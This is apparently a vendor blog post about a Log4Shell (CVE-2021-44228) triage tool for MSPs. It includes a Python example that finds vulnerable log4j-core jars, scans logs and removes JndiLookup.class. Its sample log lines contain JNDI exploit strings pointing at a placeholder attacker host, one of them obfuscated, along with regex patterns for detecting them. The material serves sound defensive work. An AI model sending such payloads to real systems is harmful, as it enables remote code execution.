On Friday, December 10, 2021, news broke widely of active exploitation of a critical vulnerability (CVE-2021-44228) in a common component of Java-based software, referred to as Log4j.
More information on the vulnerability and Datto’s initial response can be found in our Datto Response to Log4Shell blog.
The extent to which this software package is integrated into the world’s technologies and platforms is still being discovered, and enumeration of vulnerable instances or potential attacks can be difficult at scale.
Today, Datto has released both a Datto RMM component for its partners and a community script for all MSPs. Either lets you use the reach of your RMM, regardless of vendor, to enumerate systems that are potentially vulnerable and systems that may already have been attacked. The tool can also attempt to protect against subsequent attacks by applying a known workaround.
Datto Partners: RMM Component
The tool is available at no charge to Datto RMM partners via the ComStore.
MSPs can use the tool on protected systems to:
Should the component identify signs of attack, a report will be produced. A Datto RMM File/Folder Size monitor can be configured to look for this report, the presence of which is an indicator that suspicious activity was detected.
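The three steps described above (enumerate potentially vulnerable log4j-core jars, look for signs of attack in logs, and write a report only when something was found so that a file-presence monitor doubles as the alert) can be sketched in a few functions. The following is an added example, not Datto's component or community script; it assumes a vulnerable range of log4j-core 2.0 up to 2.14.1 for CVE-2021-44228, uses the removal of `JndiLookup.class` from the jar as the "known workaround" (the page does not say which workaround the Datto tool applies), and runs against constructed fixture jars and constructed log lines with placeholder hostnames under the reserved `.invalid` domain.

```python
"""Log4Shell (CVE-2021-44228) triage helpers: enumerate log4j-core jars,
flag vulnerable ones, scan logs for lookup strings, write a report file,
and optionally apply the JndiLookup.class removal workaround. Added example."""
import io
import json
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, Iterable, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 15, 0)  # first release with JNDI message lookups off by default

# ${lower:x}, ${upper:x}, ${::-x} and ${env:NAME:-x} all evaluate to x; peeling
# these wrappers off lets the direct pattern below catch the obfuscated variants.
_WRAPPER = re.compile(r"\$\{(?:lower:|upper:|::-|env:[^:}]*:-)([^${}]*)\}", re.I)
_DIRECT = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize_lookup(text: str) -> str:
    """Collapse nested lookup wrappers until the string stops changing."""
    while True:
        new = _WRAPPER.sub(lambda m: m.group(1), text)
        if new == text:
            return new
        text = new


def scan_log_lines(lines: Iterable[str]) -> List[str]:
    """Return the lines carrying a JNDI lookup trigger, raw or obfuscated."""
    return [ln for ln in lines if _DIRECT.search(normalize_lookup(ln))]


def parse_version(manifest: str) -> Optional[Tuple[int, int, int]]:
    m = re.search(r"^Implementation-Version:\s*([\d.]+)", manifest, re.M)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).strip(".").split(".") if p]
    return tuple((parts + [0, 0, 0])[:3])


def inspect_jar(path: Path) -> Dict[str, object]:
    """Version from the manifest plus whether JndiLookup.class is still inside."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        manifest = (zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
                    if "META-INF/MANIFEST.MF" in names else "")
    version = parse_version(manifest)
    in_range = version is not None and (2, 0, 0) <= version < FIXED_VERSION
    has_lookup = JNDI_LOOKUP_CLASS in names
    return {"path": str(path), "version": version,
            "vulnerable": in_range and has_lookup,
            "workaround_applied": in_range and not has_lookup}


def find_log4j_jars(root: Path) -> List[Path]:
    return sorted(Path(root).rglob("log4j-core*.jar"))


def remove_jndi_lookup(jar_path: Path) -> bool:
    """Workaround: rewrite the jar without JndiLookup.class, keeping a .bak copy."""
    jar_path = Path(jar_path)
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(item, src.read(item))
    jar_path.with_suffix(jar_path.suffix + ".bak").write_bytes(jar_path.read_bytes())
    jar_path.write_bytes(buf.getvalue())
    return True


def write_report(findings: Dict[str, object], report_path: Path) -> bool:
    """Create the file only when there is something to report."""
    if not findings["vulnerable_jars"] and not findings["suspicious_lines"]:
        return False
    Path(report_path).write_text(json.dumps(findings, indent=2, default=str))
    return True


def build_sample_jar(path: Path, version: str, include_lookup: bool = True) -> Path:
    """Constructed fixture standing in for a log4j-core jar (not a real build)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    return path


# Constructed log lines; hostnames are placeholders under the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://c2-placeholder.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://c2-placeholder.invalid/b}"',
    "login ok for alice from 10.0.0.7",
]


def run_triage(root: Path, log_lines: Iterable[str], report_path: Path) -> Dict[str, object]:
    jars = [inspect_jar(p) for p in find_log4j_jars(root)]
    findings = {"vulnerable_jars": [j for j in jars if j["vulnerable"]],
                "suspicious_lines": scan_log_lines(log_lines)}
    findings["report_written"] = write_report(findings, report_path)
    return findings


def run_demo() -> Dict[str, object]:
    """Two fixture jars in a temp dir: triage, apply the workaround, re-triage."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app").mkdir()
        vuln = build_sample_jar(root / "app" / "log4j-core-2.14.1.jar", "2.14.1")
        build_sample_jar(root / "log4j-core-2.15.0.jar", "2.15.0")
        before = run_triage(root, SAMPLE_LOG_LINES, root / "log4shell-report.json")
        remove_jndi_lookup(vuln)
        after = run_triage(root, [], root / "log4shell-report-after.json")
        return {"vulnerable_before": len(before["vulnerable_jars"]),
                "suspicious_lines": len(before["suspicious_lines"]),
                "report_written": before["report_written"],
                "vulnerable_after": len(after["vulnerable_jars"]),
                "workaround_applied": inspect_jar(vuln)["workaround_applied"]}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The version check alone is not enough: a jar in the vulnerable range whose `JndiLookup.class` has already been stripped is reported as mitigated rather than vulnerable, which is what a second sweep after remediation should show. The log scan normalizes the common `${lower:...}` and `${::-...}` wrappers before matching, because a plain substring search for `${jndi:` misses those variants.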
MSP Community: Scripts available on Github
We also investigated creating a Linux script, but found that Florian Roth's Fenrir tool already covers what MSPs would need, so there was no value in repackaging it.
If you have an attack detection that you believe to be a true positive, and you can confirm that a subsequent outbound connection to a Command and Control (C2) server was made, we suggest you work with your SIEM, SOC, MDR, MSSP or other Incident Response provider to investigate whether a threat actor is present in your environment.
Now is a time to remain vigilant and take an active stance on enumerating and patching systems against this emerging threat. We hope this tool provides you the necessary support in that endeavor.